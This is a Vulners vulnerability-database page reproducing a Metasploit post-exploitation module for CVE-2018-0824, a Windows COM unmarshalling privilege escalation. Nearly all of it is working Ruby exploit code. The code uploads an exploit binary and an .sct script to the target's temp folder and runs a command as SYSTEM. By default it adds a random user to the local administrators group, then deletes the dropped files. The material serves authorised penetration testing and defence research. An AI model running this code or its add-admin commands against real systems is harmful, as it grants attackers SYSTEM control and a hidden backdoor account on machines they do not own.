Lucene search
K

Windows unmarshal post exploitation

🗓️ 19 Oct 2018 23:15:44Reported by Nicolas Joly, Matthias Kaiser, Sanjay Gondaliya, Pratik Shah <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 100 Views

Windows unmarshal post exploitation This module exploits a local privilege escalation bug in microsoft COM for windows when it fails to properly handle serialized objects

Related
Code
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Version
  #  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows unmarshal post exploitation',
        'Description' => %q{
          This module exploits a local privilege escalation bug which exists
          in microsoft COM for windows when it fails to properly handle serialized objects.
        },
        'References' => [
          ['CVE', '2018-0824'],
          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],
          ['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],
          ['EDB', '44906']
        ],
        'Author' => [
          'Nicolas Joly', # Vulnerability discovery
          'Matthias Kaiser', # Exploit PoC
          'Sanjay Gondaliya', # Modified PoC
          'Pratik Shah <[email protected]>' # Metasploit module
        ],
        'DisclosureDate' => '2018-08-05',
        'Platform' => ['win'],
        'Arch' => ARCH_X64,
        'License' => MSF_LICENSE,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('COMMAND',
                      [false, 'The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).', nil]),
        OptString.new('EXPLOIT_NAME',
                      [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
        OptString.new('SCRIPT_NAME',
                      [false, 'The filename to use for the COM script file (%RAND% by default).', nil]),
        OptString.new('PATH',
                      [false, 'Path to write binaries (%TEMP% by default).', nil]),
      ]
    )
  end

  def setup
    super
    validate_active_host
    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
    @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
    @script_name = "#{script_name}.sct" unless script_name.match(/\.sct$/i)
    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
    @exploit_path = "#{temp_path}\\#{exploit_name}"
    @script_path = "#{temp_path}\\#{script_name}"
  end

  def populate_command
    username = Rex::Text.rand_text_alpha(rand(6..13))
    password = Rex::Text.rand_text_alpha(rand(6..13))
    print_status("username = #{username}, password = #{password}")
    cmd_to_run = 'net user /add ' + username + ' ' + password
    cmd_to_run += '  & net localgroup administrators /add ' + username
    print_status(cmd_to_run)
    return cmd_to_run
  end

  def validate_active_host
    print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog(e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end

  def validate_remote_path(path)
    unless directory?(path)
      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
    end
  end

  def validate_target
    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end
    version = get_version_info
    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win10_1803)
      fail_with(Failure::Unknown, 'The exploit does not support this OS')
    end
  end

  def ensure_clean_destination(path)
    if file?(path)
      print_status("#{path} already exists on the target. Deleting...")
      begin
        file_rm(path)
        print_status("Deleted #{path}")
      rescue Rex::Post::Meterpreter::RequestError => e
        elog(e)
        print_error("Unable to delete #{path}")
      end
    end
  end

  def upload_exploit
    local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
    upload_file(exploit_path, local_exploit_path)
    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
  end

  def upload_script(cmd_to_run)
    vprint_status("Creating the sct file with command #{cmd_to_run}")
    local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')
    script_template_data = ::IO.read(local_script_template_path)
    vprint_status("script_template_data.length =  #{script_template_data.length}")
    full_command = 'cmd.exe /c ' + cmd_to_run
    full_command = full_command
    script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
    if script_data.nil?
      fail_with(Failure::BadConfig, 'Failed to substitute command in script_template')
    end
    vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
    write_file(script_path, script_data)
    vprint_status('Script uploaded successfully')
  end

  def run
    if datastore['COMMAND'].nil?
      cmd_to_run = populate_command
    else
      cmd_to_run = datastore['COMMAND']
    end
    print_status("exploit path is: #{exploit_path}")
    print_status("script path is: #{script_path}")
    print_status("command is: #{cmd_to_run}")
    begin
      validate_active_host
      validate_target
      validate_remote_path(temp_path)
      ensure_clean_destination(exploit_path)
      ensure_clean_destination(script_path)
      vprint_status("Uploading Script to #{script_path}")
      upload_script(cmd_to_run)
      vprint_status("Uploading Exploit to #{exploit_path}")
      upload_exploit
      vprint_status('Launching Exploit...')
      command_output = cmd_exec(exploit_path + ' ' + script_path)
      vprint_status(command_output)
      print_good('Exploit Completed')
      ensure_clean_destination(exploit_path)
      ensure_clean_destination(script_path)
    rescue Rex::Post::Meterpreter::RequestError => e
      elog('Command failed, cleaning up', error: e)
      print_good('Command failed, cleaning up')
      print_error(e.message)
      ensure_clean_destination(exploit_path)
      ensure_clean_destination(script_path)
    end
  end
  attr_reader :exploit_name, :script_name, :temp_path, :exploit_path, :script_path
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 May 2023 04:36Current
7.5High risk
Vulners AI Score7.5
CVSS 25.1
CVSS 3.18.8
EPSS0.73469
100